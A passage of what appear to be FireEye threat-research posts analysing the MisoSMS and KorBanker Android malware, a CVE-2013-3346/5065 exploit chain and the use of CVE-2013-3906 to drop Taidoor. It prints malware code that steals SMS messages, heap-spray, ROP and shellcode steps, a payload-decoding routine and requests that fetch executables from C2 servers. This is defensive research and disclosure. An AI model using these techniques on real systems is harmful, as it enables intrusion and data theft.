      • Hitmen — Although this analysis is still highly speculative, some threat actors, such as Hidden Lynx, may be “hackers for hire”, tasked with breaking into targets and acquiring specific information. Others, such as IceFog, engage in “hit and run” attacks, including the propagation of malware in a seemingly random fashion. Another group, known as Winnti, tries to profit by targeting gaming companies with malware (PlugX) that is normally associated with APT activity. In one of the weirdest cases I have seen, malware known as “MiniDuke”, which is reminiscent of some “old school” malware developed by 29A, was used in multiple attacks around the world.

      My colleagues at FireEye have put forward some interesting stealthy techniques in the near future. In any case, 2014 will no doubt be another busy year for those of us who research targeted malware attacks.

      MisoSMS: New Android Malware Disguises Itself as a Settings App, Steals SMS Messages

      FireEye has uncovered and helped weaken one of the largest advanced mobile botnets to date. The botnet, which we are dubbing “MisoSMS,” has been used in at least 64 spyware campaigns, stealing text messages and emailing them to cybercriminals in China.

      MisoSMS infects Android systems by deploying a class of malicious Android apps. The mobile malware masquerades as an Android settings app used for administrative tasks. When executed, it secretly steals the user’s personal SMS messages and emails them to a command-and-control (CnC) infrastructure hosted in China. FireEye Mobile Threat Prevention platform detects this class of malware as “Android.Spyware.MisoSMS.”

      Here are some highlights of MisoSMS:

      • We discovered 64 mobile botnet campaigns that belong to the MisoSMS malware family.
      • Each of the campaigns leverage Web mail as its (CnC) infrastructure.
      • The CnC infrastructure comprises more than 450 unique malicious email accounts.
      • FireEye has been working with the community to take down the CnC infrastructure.
      • The majority of the devices infected are in Korea, which leads us to believe that this threat is active and prevalent in that region.
      • The attackers logged in from Korea and mainland China, among other locations, to periodically read the stolen SMS messages.

      MisoSMS is active and widespread in Korea, and we are working with Korean law enforcement and the Chinese Web mail vendor to mitigate this threat. This threat highlights the need for greater cross-country and cross-organizational efforts to take down large malicious campaigns.

      At the time of of this blog post, all of the reported malicious email accounts have been deactivated and we have not noticed any new email addresses getting registered by the attacker. FireEye Labs will closely monitor this threat and continue working with relevant authorities to mitigate it.

      Technical Analysis

      Once the app is installed, it presents itself as “Google Vx.” It asks for administrative permissions on the device, which enables the malware to hide itself from the user, as shown in Figure 2.


      The message in Figure 3 translates to the following:

      “This service is vaccine killer \nCopyright (c) 2013”


      Once the user grants administrator privileges to the app, the app shows the message in Figure 3, which translates to “The file is damaged and can’t use. Please check it on the website”” and an OK button. Then is asks the user to confirm deletion, ostensibly offering the option to Confirm or Cancel. If the user taps Confirm, the app sleeps for 800 milliseconds then displays a message that says “Remove Complete.” If the users taps Cancel, the app still displays the “Remove Complete” message.

      In either case, the following API call is made to hide the app from the user.



      MainActivity.this.getComponentName(), 2, 1);

      This application exfiltrates the SMS messages in a unique way. Some SMS-stealing malware sends the contents of users SMS messages by forwarding the messages over SMS to phone numbers under the attacker’s control. Others send the stolen SMS messages to a CnC server over TCP connections. This malicious app, by contrast, sends the stolen SMS messages to the attacker's email address over an SMTP connection. Most of the MisoSMS-based apps we discovered had no or very few vendor detections on VirusTotal.

      The app initially sends an email with the phone number of the target’s device in the message body. This is shown in the screenshot capture below.



      The malicious app creates a database called “soft_data” at install time. It also creates a database table by executing the SQL query below.

      paramSQLiteDatabase.execSQL("CREATE TABLE IF NOT EXISTS ulccd(id varchar(50),sender varchar(50),date varchar(20),content varchar(500))");

      The application registers a service for the SMS_RECEIVED intent. Once it receives the intent, the app invokes a call to the com.mlc.googlevx.SinRecv.onGetMsg() method. The moment a MisoSMS-infected device receives an SMS, the method extracts the contents of that SMS and creates the key-value pairs as follows:

      ("sender", this.val$str1);              // Phone number of the sender of the SMS

      ("content", this.val$str2);             // Content of the SMS message

      ("date", this.val$str3);                // Date of the SMS

      ("id", "1");                            // Hardcoded identifier

      ("key",;                // Device ID

      ("op", "Add");                          // Operation to be performed “Add” indicates SMS to be added

      ("phone_number", xdataStruct.selfnum);  // Phone number of the infected user

      The above data is recorded and an email message is sent out with the subject line set to the phone number of the infected device. The body of the email message contains the phone number of the device that sent a message to the infected device and its contents. Figure 6 below shows a packet capture of this data as it is sent.


      If the sending of the email fails, it logs the SMS messages in the soft_data database.

      The application also starts three services in the background once the app is installed and started: RollService, MisoService, and BaseService.


      This service initiates a sleep call for the first five minutes of execution. Once the sleep call is complete, RollService polls the soft_data database and tries to send any SMS data that failed to send earlier. Once it sends the information successfully, RollService deletes that data from the soft_data database.


      Once started, MisoService spawns a thread in the background. This thread is responsible for replaying information to the CnC channel. Messages are replayed using data structures that are converted into byte streams. The components of those structures are shown below:

      Replay Structure:


      public final int Request_BookInfo_len = 70;


      public final int Request_Head_Len = 95;

      public final int Request_RecPhoneInfo_Len = 8;

      public Vector<RequestStruct_BookInfo> book_list = new Vector(); contains

                    public String book_name = "";

      public String book_num = "";

      public RequestStruct_Head data_head = new RequestStruct_Head(); contains

                    public String android_id = "";

                    public int book_count = 0;

      public short client_version = 1;

      public byte is_back_door = 0;

      public String os_version = "";

      public short phone_book_state = 0;

      public String phone_model = "";

      public String phone_num = "";

      public short sms_rec_phone_count = 0;

      public int sms_task_id = 0;

      public Vector<RequestStruct_RecPhoneInfo> rec_phone_list = new Vector(); contains

                    public int reccode = 0;  public int recphoneid = 0;

      Request Structure:

      public final int Replay_Head_Len = 583;

      public final int Replay_NewAddr_Len = 261;

      public final int Replay_RecPhone_len = 24;

      public ReplayStruct_Head data_head = new ReplayStruct_Head(); contains

                  public byte is_send_book = 0;

      public byte is_uninstall_backdoor = 0;

      public byte is_upbook = 0;

      public byte is_update = 0;

      public String last_client_url = "";

      public short last_client_url_len = 0;

      public short last_client_version = 1;

      public short new_addr_count = 0;

      public short reconn_deply = 300;

      public String sms_task_content = "";

      public int sms_task_id = 0;

      public short sms_task_rec_phone_count = 0;

      public Vector<ReplayStruct_NewAddrInfo> new_addr_list = new Vector(); contains

                  public short new_addr_len = 0;

      public int new_addr_port = 8080;

      public String new_addr_url = "";

      public Vector<ReplayStruct_RecPhoneInfo> rec_phone_list = new Vector(); contains


                  public int rec_phone_id = 0;

      public String rec_phone_num = "";

      Once MisoService is initiated, it checks whether the phone is connected to the Internet and the cellular network. If so, it sends a byte array formed by the request data structure shown above. It then makes a copy of data from the request structure into the replay structure and sends the byte array of the request structure via SMS.

      The phone number for this SMS is not specified in the code, so these messages are not sent for the time being. But all of this information is logged into the soft_data database, and an update to the app will send the SMS and the above-mentioned data. MisoService also uses an embedded source object called to perform socket connections to the SMTP server using Java Native Interfaces. This shared object is unique to this malware family, which is  why we named this malware Android.Spyware.MisoSMS.

      Here is an excerpt of the code for the MisoService:



      static {








      static byte[] access$1(byte[] arg1) {

              return MisoService.jndkAction(arg1);






      private static native byte[] jndkAction(byte[] arg0) {




      public void onCreate() {




      new Thread() {

      public void run() {



                              while(true) {

                                          if((BaseSystem.isNetworkAvailable(MisoService.this.context)) &&


                                          (BaseSystem.isPhoneAvailable(MisoService.this.context))) {


                                                      if(BaseSystem.android_id.equals("")) {




      MisoData.request_data.data_head.android_id = BaseSystem.android_id;

                                         MisoData.request_data.data_head.phone_model = BaseSystem.phone_model;

                                          MisoData.request_data.data_head.os_version = BaseSystem.os_version;

                                          MisoData.request_data.data_head.phone_num = BaseSystem.phone_num;

                                          byte[] v0 = MisoService.jndkAction(NetDataCover.RequestToBytes(MisoData.request_data ));


                                          if(v0 != null) {


                                                      MisoData.replay_data = NetDataCover.BytesToReplay(v0);



                              if(MisoData.replay_data.data_head.sms_task_rec_phone_count != 0) {



                              SystemClock.sleep(((long)(MisoData.replay_data.data_head.reconn_deply * 100 )));








      The value for MisoData.replay_data.data_head.reconn_deply is set to 300, putting the service to sleep for 30 seconds between retries.


      The base service ensures that RollService and MisoService do not stop running. The BaseBootReceiver class also uses BaseService to start the other two service if the device reboots.

      BaseService.this.startService(new Intent(BaseService.this.context, RollService.class));

      BaseService.this.startService(new Intent(BaseService.this.context, MisoService.class));


      MisoSMS is one of the largest mobile botnets that leverages modern botnet techniques and infrastructure. This discovery, coupled with the other discoveries from FireEye, highlights the importance of mobile security and the quickly changing threat landscape.

      CVE-2013-3346/5065 Technical Analysis

      In our last post, we warned of a new Windows local privilege escalation vulnerability being used in the wild. We noted that the Windows bug (CVE-2013-5065) was exploited in conjunction with a patched Adobe Reader bug (CVE-2013-3346) to evade the Reader sandbox. CVE-2013-3346 was exploited to execute the attacker’s code in the sandbox-restricted Reader process, where CVE-2013-5065 was exploited to execute more malicious code in the Windows kernel.

      In this post, we aim to describe the in-the-wild malware sample, from initial setup to unrestricted code execution.

      CVE-2013-3346: Adobe Reader ToolButton Use-After-Free

      CVE-2013-3346 was privately reported to ZDI by Soroush Dalili, apparently in late 2012. We could fine no public description of the vulnerability. Our conclusion that the sample from the wild is exploiting CVE-2013-3346 is based upon the following premises:

      1. The sample contains JavaScript that triggers a use-after-free condition with ToolButton objects.
      2. CVE-2013-3346 is a use-after-free condition with ToolButton objects.
      3. The Adobe Reader patch that addresses CVE-2013-3346 also stops the in-the-wild exploit.
      4. CVE-2013-3346 Exploitation: Technical Analysis

        The bug is a classic use-after-free vulnerability: Within Javascript, nesting ToolButton objects and freeing the parent from within child callbacks results in a stale reference to the freed parent. More specifically, the invalid free can be triggered as follows:

        1. Make a parent ToolButton with a callback CB
        2. Within the callback CB, make a child ToolButton with a callback CB2
        3. Within the callback CB2, free the parent ToolButton
        4. The sample from the wild exploits the bug entirely from JavaScript. The code sets up the heap, builds ROP chains, builds shellcode, and triggers the actual bug. The only component of the attack that wasn’t implemented in JavaScript is the last-stage payload (executable file).

          The exploit script first chooses some parameters based upon the major version of Reader (version 9, 10, or 11):

          • ROP Chain
          • Size of corrupted object
          • Address of pivot in heap spray
          • The address of a NOP gadget

          Next, it sprays the heap with the return-oriented programming (ROP) attack chain and shellcode, triggers the freeing, and fills the hole left by the freed object with a pivot to the ROP attack chain.

          The freed hole is filled with the following:

          000: 41414141 ;; Padding

          01c: 0c0c08e4 ;; Address of pivot in heap spray

          020: 41414141 ;; More padding

          37c: 41414141 ;; The size of the object is a version-specific parameter

          The pivot can be observed with the following windbg breakpoint:

          bp 604d7699 "!heap -p -a @esi; dd @esi-1c; .if (@eax != 0x0c0c08e4) { gc; }"

          The following code shows the object before corruption:

              address 02668024 found in

          _HEAP @ 1270000

          HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

          02668000 0071 0000 [01] 02668008 0037c - (busy)

          02668008 01278420 00000000 00000002 02a24008

          02668018 02763548 00000360 02668008 60a917d4

          02668028 00000000 60a917a8 00000000 00000000

          02668038 60a91778 00000000 60a91768 0133ded4

          02668048 00000001 01d9eb60 00000001 02668024

          02668058 00000000 00000000 00000000 00000000

          02668068 00000000 00000000 00000000 00000000

          02668078 02f32e5c 00000002 00000004 00000000

          After corruption, the freed hole has been filled by padding and the address into the heap at object plus 0x1c as follows:

              address 02668024 found in

          _HEAP @ 1270000

          HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

          02668000 0071 0000 [01] 02668008 0037c - (busy)

          02668008 41414141 41414141 41414141 41414141

          02668018 41414141 41414141 41414141 0c0c08e4

          02668028 41414141 41414141 41414141 41414141

          02668038 41414141 41414141 41414141 41414141

          02668048 41414141 41414141 41414141 41414141

          02668058 41414141 41414141 41414141 41414141

          02668068 41414141 41414141 41414141 41414141

          02668078 41414141 41414141 41414141 41414141

          The heap-spray address points to the address of the pivot minus 0x328. This is because of the following instruction, which calls the address plus 0x328 as follows:

          604d768d 8b06            mov     eax,dword ptr [esi]

          604d7699 ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=90e0824a

          1:009> dd @eax+0x328

          0c0c0c0c 4a82e090 4a82007d 4a850038 4a8246d5

          0c0c0c1c ffffffff 00000000 00000040 00000000

          0c0c0c2c 00001000 00000000 4a805016 4a84420c

          0c0c0c3c 4a814241 4a82007d 4a826015 4a850030

          0c0c0c4c 4a84b49d 4a826015 4a8246d5 4a814197

          0c0c0c5c 00000026 00000000 00000000 00000000

          0c0c0c6c 4a814013 4a84e036 4a82a8df 41414141

          0c0c0c7c 00000400 41414141 4a818b31 4a814197

          And the pivot is set at 4a82e090, which sets the stack pointer to the attacker’s ROP chain as follows:

          1:009> u 4a82e090


          4a82e090 50 push eax

          4a82e091 5c pop esp

          4a82e092 c3 ret

          The exploit plays out in stages.

          Stage 1: ROP

          The exploit uses ROP to circumvent data execution prevention (DEP) features. All of the gadgets, including the pivot, are from icucnv40.dll. The ROP chain is one of three chains chosen by Reader major version (9, 10, or 11). The attacker uses a heapspray to place the pivot, ROP chain, and shellcode at predictable addresses. The ROP chain:

          1. Maps RWX memory with kernel32!CreateFileMappingA and kernel32!MapViewOfFile
          2. Copies Stage 2 shellcode to RWX memory with MSVCR90!memcpy
          3. Executes the shellcode
          4. Stage 2: Shellcode

            The shellcode exploits CVE-2013-5065 to set the privilege level of the Reader process to that of system, and then decodes an executable from the PDF, writes it to the temporary directory, and executes it.

            Shellcode Technical Analysis

            First, the shellcode copies a Stage 2.1 shellcode stub to RWX memory mapped to the null page.

            0af: ntdll!NtAllocateVirtualMemory RWX memory @ null page

            180: Copy privileged shellcode to RWX memory

            183: Add current process ID to privileged shellcode

            Next, the shellcode exploits CVE-2013-5065 to execute the Stage 2.1 shellcode in the context of the Windows kernel as follows:

            19b: Trigger CVE-2013-5065 to execute stage 2.1 from kernel

            - :



            303: Stage 2.1 shellcode begins

            3d6: PsLookupProcessByProcessId to get EPROCESS structure for Reader process

            3e5: PsLookupProcessByProcessId to get EPROCESS structure for system

            3f9: Copy EPROCESS.Token from system to Reader

            3fd: Zero the EPROCESS.Job field

            This process is documented well in a paper (PDF download) from security researcher Ronnie Johndas.

            After returning from the kernel, the shellcode iterates over potential handle values, looking for the encoded PE file embedded within the PDF as follows:.

            ...: Find open handle to the PDF file by iterating over potential

            ...: handle values (0, 4, 8, ...) and testing that:

            212: The handle is open and to a file with kernel32!SetFilePointer

            21e: The file size is less than 0x1000 bytes with kernel32!GetFileSize

            239: It begins with "%PDF" with kernel32!ReadFile

            257: Allocate memory with kernel32!VirtualAlloc and

            262: Read the PDF into memory with kernel32!ReadFile

            26f: Find the encoded PE file by searching for 0xa0909f2 with kernel32!ReadFile

            The shellcode decodes the PE file using the following algorithm and writes it to disk:

            def to_u8(i):

            if i >= 0: return i

            return 0xff + i + 1

            buf = buf[4:] # Skip the first four bytes

            for i in xrange(len(buf)):

            c = ord(buf[i])

            c -= ((i)**2)&0xff # Subtract index^2 from character

            c = to_u8(c) # convert python number to uint8

            c ^= 0xf3 # xor character with 0xf3



            28f: Decode the PE file (algorithm supplied below)

            2ad: Get the path to the temporary directory with kernel32!GetTempPathA

            2bb: Request a temporary file with kernel32!GetTempFileNameA

            2dd: Open the temporary file with kernel32!CreateFileA

            2f0: Write decoded PE to temporary file with kernel32!WriteFile

            2f4: Close the file

            The shellcode executes the decoded PE file as follows:

            2fe:	kernel32!WinExec "cmd /c "


            JavaScript Obfuscation & Evasions

            JavaScript analysis engines often emulate suspect code to de-obfuscate it for further analysis. If the JavaScript emulation environment doesn’t match the real environment (that is, JavaScript in Adobe Reader during exploitation), then the attacker can detect a discrepancy and abort the exploitation to prevent detection. The exploit implementation begins with the following instruction, what appears to be emulation-evasion code that causes the script to crash within emulation systems such as jsunpack:

            if( >= 1)


            The attacker used a public tool ( with "global variable name" = "Q") to obfuscate the exploit. It works by building a dictionary that maps wonky names to hex digits as follows:

            // Q={___:"0", $$$$:"f", __$:"1", $_$_:"a", _$_:"2", $_$$:"b", $$_$:"d", _$$:"3", $$$_:"e", $__:"4", $_$:"5", $$__:"c", $$_:"6", $$$:"7", $___:"8", $__$:"9" };



            Then, using the dictionary and other built-in strings, it builds more JavaScript code as follows:

            // Q.$_ = "constructor"

            Q.$_= /*c*/(Q.$_=Q+"")[Q.$_$]+ // Q.$_ = the string "[object Object]"

            /*o*/(Q._$=Q.$_[Q.__$])+ // by indexing into Q.$_

            /*n*/(Q.$$=(Q.$+"")[Q.__$])+ // by indexing into the string "undefined"

            /*s*/((!Q)+"")[Q._$$]+ // and so on...








            It goes on to acquire a reference to the Function object by accessing "".constructor.constructor and calling the exploit code by Function("the deobfuscated script")(). The end result is an entirely indigestible script. Yuck!

            The "".constructor.constructor trick is clever. While shortening the obfuscated script, it gets around Function hooks implemented within the JavaScript environment (that is, by “Function = _Function_hook;”).

            Sandbox Bypass

            Although the Adobe Reader sandbox for Windows XP has fewer restrictions compared to sandboxes in Windows 7, 8, and 8.1, it still has restricted tokens, limited Job settings, broker processes, and protection policies.

            The difference is that the Windows integrity mechanism is not available in Windows XP. So the sandboxed process does not run in low-integrity mode.

            But it still must bypass the sandbox protection on Windows XP to run privileged malicious code. As the following screenshot shows, the sandboxed process is not allowed to create a file in the currently logged in user’s desktop:


            Figure 1: Sandboxing protection in Windows XP

            In this case, the attacker exploits the NDProxy.sys vulnerability to obtain a higher privilege and bypass the Adobe sandbox protections.


            For this kernel exploit (CVE-2013-5065), the attacker uses Windows’ NtAllocateVirtualMemory() routine to map shellcode to the null page. So enabling null-page protection in Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) prevents exploitation. You can also follow the workaround posted on Microsoft’s TechNet blog or upgrade to a newer version of Windows (Vista, 7, 8, or 8.1).

            Finally, updating Adobe Reader stops the in-the-wild malware sample by patching the CVE-2013-3346 vulnerability.


            The CVE-2013-3346/5065 vulnerability works as follows:

            1. The ROP chain and shellcode are sprayed to memory from JavaScript
            2. CVE-2013-3346 UAF is triggered from JavaScript
            3. The freed ToolButton object is overwritten with the address of the pivot in JavaScript
            4. The pivot is executed, and the stack pointer is set to the ROP sled
            5. The ROP allocates shellcode in RWX memory and jumps to it
            6. The shellcode stub (Stage 2.1) is copied to the null page (RWX)
            7. The shellcode triggers CVE_2013-5065 to call Stage 2.1 from the kernel
            8. Stage 2.1 elevates privilege of the Adobe Reader process
            9. Back to usermode, the PE payload is decoded from the PDF stream to a temp directory
            10. The PE payload executes
            11. MS Windows Local Privilege Escalation Zero-Day in The Wild

              FireEye Labs has identified a new Windows local privilege escalation vulnerability in the wild. The vulnerability cannot be used for remote code execution but could allow a standard user account to execute code in the kernel. Currently, the exploit appears to only work in Windows XP.

              This local privilege escalation vulnerability is used in-the-wild in conjunction with an Adobe Reader exploit that appears to target a patched vulnerability. The exploit targets Adobe Reader 9.5.4, 10.1.6, 11.0.02 and prior on Windows XP SP3. Those running the latest versions of Adobe Reader should not be affected by this exploit.

              Post exploitation, the shellcode decodes a PE payload from the PDF, drops it in the temporary directory, and executes it.


              The following actions will protect users from the in-the-wild PDF exploit:

              1) Upgrade to the latest Adobe Reader

              2) Upgrade to Microsoft Windows 7 or higher

              This post was intended to serve as a warning to the generic public. We are collaborating with the Microsoft Security team on research activities. Microsoft assigned CVE-2013-5065 to this issue.

              We will continue to update this blog as new information about this threat is found.

              [Update]: Microsoft released security advisory 2914486 on this issue.

              Dissecting Android KorBanker

              FireEye recently identified a malicious mobile application that installs a fake banking application capable of stealing user credentials. The top-level app acts as a bogus Google Play application, falsely assuring the user that it is benign.

              FireEye Mobile Threat Prevention platform detects this application as Android.KorBanker. This blog post details both the top-level installer as well as the fake banking application embedded inside the top-level app.

              The app targets the following banks, all of which are based in Korea.

              • Hana Bank
              • IBK One
              • KB Kookmin Bank
              • NH Bank
              • Woori Bank
              • Shinhan Bank

              Once installed, the top-level application presents itself as a Google Play application. It also asks the user for permission to activate itself as a device administrator, which gives KorBanker ultimate control over the device and helps the app stay hidden from the app menu.


              The user sees the messages in Figure 1 and Figure 2.


              The message in Figure 2 translates to: “Notification installation file is corrupt error has occurred. Sure you want to delete the corrupted files?”

              When the user clicks taps the “Yes’ button, KorBanker hides itself from the user by calling the following Android API:

              getPackageManager().setComponentEnabledSetting(new ComponentName("", ""), 2, 1)

              The arguments “2” and “1” which are being passed to the above function are explained below.

              The 2 argument represents is the value for the COMPONENT_ENABLED_STATE_DISABLED flag, which causes the component to be disabled from the menu of apps.

              The 1 argument is the value for the DONT_KILL_APP flag, which indicates that the app should not be killed and continue running in the background.

              After installation, the app checks whether any of the six targeted banking applications have been installed. If it finds any, it deletes the legitimate banking application and silently replaces it with a fake version. The fake versions of the banking applications are embedded in the “assets” directory of the top-level APK.

              Initial registration protocol

              The top-level APK and the embedded fake banking app register themselves with their respective command-and-control (CnC) servers. The following section explains the registration process.

              Top-level app

              The top-level app registers itself by sending the device ID of the phone to the remote CnC server packed in a JavaScript Object Notation (JSON) object. The data packet excerpt is shown in Figure 3. This is the first packet that is sent out once the app is installed on the device.


              Figure 3: KorBanker data packet during registration

              The packet capture shown in Figure 3 shows the structure of the registration message. The bytes highlighted in red indicate the CnC message code of 0x07(decimal 7) which translates to the string addUserReq.

              Outlined in yellow is length indicator — 0x71(113 bytes)— followed by the JSON object containing the Device ID and the phone number of the device. The values for callSt and smsSt are statically set to 21 and 11, respectively.

              The response bytes shown in black containing 0x04 and 0x01 map to the command addUserAck. They are sent by the server to acknowledge the receipt of the previously sent addUserReq. Code inside the application invokes various functions as it receives commands. These functions may exist for future updates of the application.


              Figure 4: KorBanker code for sending incoming messages to CnC server

              Once the installation of the app has been registered, the app waits for incoming messages on the phone, possibly looking for access codes that arrive as a part of two factor authentication methods for one of the six targeted banks. All incoming messages to the phone are intercepted and sent to the CnC server on port 8888 as shown in Figure 4.

              The bytes highlighted in red after the response show the message code of 0x08 (Decimal 8), which translates to the command addSmsReq. This is followed by the size of the message. The Device ID is sent at the end of the data packet to identify the device from which this message was seen with the timestamp. It also suppresses the SMS notifications from the user and deletes the message from the device.

              The remote CnC infrastructure is based on numeric codes. These codes are stored in a data structure in the app. All incoming messages and responses from the CnC server arrive in numeric codes and get translated into corresponding strings, which in turn drive the app to perform different tasks.

              Table 1 shows the CnC commands supported by the top-level app. All the commands ending with “Req” correspond to the infected client requests made to the CnC server. All the commands ending with “Ack” indicate acknowledgements of the received commands.


              Fake banking app 

              The fake banking app once installed registers with a CnC server on a different IP address by sending the HTTP request shown below.


              Figure 5: Data capture showing the installation of the fake banking app 

              Once the phone is registered, the user is presented with the following fake login page of the banking app, which prompts the user for banking account credentials. All these credentials are stored internally in a JSON object. korbanker_6

              The user is then prompted for a SCARD code and 35-digit combination, which is recorded into the JSON and sent out to ‘ as follows:

              { "renzheng" : "1234",

              "fenli" : "1234",

              "datetime" : "2013-08-12 12:32:32",


              "bankinid": '1234',

              "jumin": '1234',

              "banknum" : '1234',

              "banknumpw" : '1234',

              "paypw" : 'test',

              "scard" : "1234567890",

              "sn1" : "1234",

              "sn2" : "1234",

              "sn3" : "1234",



              "sn34" : "1234",

              "sn35" : "1234"


              The response received is as follows:

              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

              Connection: close

              Content-Type: text/html

              Date: Fri, 22 Nov 2013 02:05:00 GMT

              Expires: Thu, 19 Nov 1981 08:52:00 GMT



              This malware sample takes extra measures to obtain banking credentials. With the increased usage of mobile devices and with the liberal permission allotment to apps that appear benign we are now at an increased risk of monetary losses on the mobile front. Mobile banking is not completely void of its adversaries. KorBanker is a vivid reminder of just how dangerous apps from untrusted sources can be.

              Monitoring Vulnaggressive Apps on Google Play

              Vulnaggressive Characteristics in Mobile Apps and Libraries

              FireEye mobile security researchers have discovered a rapidly-growing class of mobile threats represented by popular ad libraries affecting apps with billions of downloads. These ad libraries are aggressive at collecting sensitive data and able to perform dangerous operations such as downloading and running new code on demand. They are also plagued with various classes of vulnerabilities that enable attackers to turn their aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. We have published some of our findings in our two recent blogs about these threats: “Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions” and “Update: Ad Vulna Continues”.

              As we reported in our earlier blog “Update: Ad Vulna Continues”, we have observed that some vulnaggressive apps have been removed from Google Play, and some app developers have upgraded their apps to a more secure version either by removing the vulnaggressive libraries entirely or by upgrading the relevant libraries to a more secure version which address the security issues. However, many app developers are still not aware of these security issues and have not taken such needed steps. We need to make a community effort to help app developers and library vendors to be more aware of these security issues and address them in a timely fashion.

              To aid this community effort, we present the data to illustrate the changes over time as vulnaggressive apps are upgraded to a more secure version or removed from Google Play after our notification. We summarize our observations below, although we do not have specific information about the reasons that caused these changes we are reporting.

              We currently only show the chart for one such vulnaggressive library, AppLovin (previously referred to by us as Ad Vulna for anonymity). We will add the charts for other vulnaggressive libraries as we complete our notification/disclosure process and the corresponding libraries make available new versions that fix the issues.

              The Chart of Apps Affected by AppLovin

              AppLovin (Vulna)’s vulnerable versions include 3.x, 4.x and 5.0.x. AppLovin 5.1 fixed most of the reported security issues. We urge app developers to upgrade AppLovin to the latest version and ask their users to update their apps as soon as the newer versions are available.

              The figure below illustrates the change over time of the status of vulnerable apps affected by AppLovin on Google Play. In particular, we collect and depict the statistics of apps that we have observed on Google Play with at least 100k downloads and with at least one version containing the vulnerable versions of AppLovin starting September 20. Over time, a vulnerable app may be removed by Google Play (which we call “removed apps”, represented in gray), have a new version available on Google Play that addresses the security issues either by removing AppLovin entirely or by upgrading the embedded AppLovin to 5.1 or above (which we call “upgradable apps”, represented in green), or remain vulnerable (which we call “vulnerable apps”, represented in red), as shown in the legend in the chart.

              Please note that we started collecting the data of app removal from Google Play on October 20, 2013. Thus, any relevant app removal between September 20 and October 20 will be counted and shown on October 20. Also, for each app included in the chart, Google Play shows a range of its number of downloads, e.g., between 1M and 5M. We use the lower end of the range in our download count so the statistics we show are conservative estimates.


              We are glad to see that over time, many vulnerable apps have been either removed from Google Play or have more secure versions available on Google Play. However, apps with hundreds of millions of downloads in total still remain vulnerable. In addition, note that while removing vulnaggressive apps from Google Play prevents more people from being affected, the millions of devices that already downloaded them remain vulnerable since they are not automatically removed from the devices. Furthermore, because many users do not update their downloaded apps often and older versions of Android do not auto-update apps, even after the new, more secure version of a vulnerable app is available on Google Play, millions of users of these apps will remain vulnerable until they update to the new versions of these apps on their devices. FireEye recently announced FireEye Mobile Threat Prevention. It is uniquely capable of protecting its customers from such threats.

              Exploit Proliferation: Additional Threat Groups Acquire CVE-2013-3906

              Last week, we blogged about a zero-day vulnerability (CVE-2013-3906) that was being used by at least two different threat groups. Although it was the same exploit, the two groups deployed it differently and dropped very different payloads. One group, known as Hangover, engages in targeted attacks, usually, against targets in Pakistan. The second group, known as Arx, used the exploit to spread the Citadel Trojan, and we have found that they are also using the Napolar (aka Solar) malware. [1]

              Looking at the time of the first known use of the exploit, we noted that the Arx group appeared to have had access to this exploit prior to the Hangover group. Subsequent research by Kaspersky has found that this exploit was used in July 2013 to spread a cross-platform malware known as Janicab. Interestingly, the Janicab samples have exactly the same CreateDate and ModifyDate as the Arx samples. However, the ZipModifyDate is different. They also contain the same embedded TIFF file (aa6d23cd23b98be964c992a1b048df6f).

              While the Janicab activity dates the use of CVE-2013-3906 to July, other groups, including those associated with advanced persistent threat (APT) activity, have now begun to use this exploit as well. We have found that CVE-2013-3906 is now being used to drop Taidoor and PlugX (which we call Backdoor.APT.Kaba). Interestingly, the version of the exploit used contains elements that are consistent with the Hangover implementation. Both the Taidoor and PlugX samples have EXIF data that is consistent with a Hangover sample. In addition, the samples share the same embedded TIFF file (7dd89c99ed7cec0ebc4afa8cd010f1f1).


              The Taidoor malware has been used in numerous targeted attacks that typically affect Taiwan-related entities. We recently blogged about modifications that have been made to the Taidoor malware. This new version of Taidoor is being dropped by malicious documents using the CVE-2013-3906 exploit. The malware is being distributed via an email purporting to be from a Taiwanese government email address.


              The Taidoor sample we analyzed (6003b22d22af86026afe62c39316b9e0) has the same CreateDate and ModifyDate as the Hangover samples we analyzed. It also shares an exact ZipModifyDate with one of the Hangover samples. (There are variations in the ZipModifyDate among the Hangover samples).

              • CreateDate                : 2013:10:03 22:46:00Z
              • ModifyDate                : 2013:10:03 23:17:00Z
              • ZipModifyDate           : 2013:10:17 14:21:23

              It also contains other EXIF data that matches a Hangover sample (and the PlugX sample discussed below):

              • App Version                     : 12.0000
              • Creator                            : Win7
              • Last Modified By              : Win7
              • Revision Number             : 1

              The sample also contains the same embedded TIFF file (7dd89c99ed7cec0ebc4afa8cd010f1f1). This indicates that they were probably built with the same weaponizer tool.

              After the exploit is triggered a connection is made to a retrieve an EXE from a webserver:

              GET /o.exe HTTP/1.1

              Accept: */*

              Accept-Encoding: gzip, deflate

              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


              Connection: Keep-Alive

              This EXE is Taidoor and it is configured to beacon to two command and control (CnC) servers: and

              GET /user.jsp?ij=oumded191138F9744C HTTP/1.1

              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


              Connection: Keep-Alive

              Cache-Control: no-cache

              GET /parse.jsp?js=iwmnxw191138F9744C HTTP/1.1

              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


              Connection: Keep-Alive

              Cache-Control: no-cache

              We have located an additional sample (5c8d7d4dd6cc8e3b0bd6587221c52102) that also retrieves Taidoor:

              GET /suv/update.exe HTTP/1.1

              Accept: */*

              Accept-Encoding: gzip, deflate

              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


              Connection: Keep-Alive

              This sample beacons to the command and control server: (

              GET /parse.jsp?ne=vyhavf191138F9744C HTTP/1.1

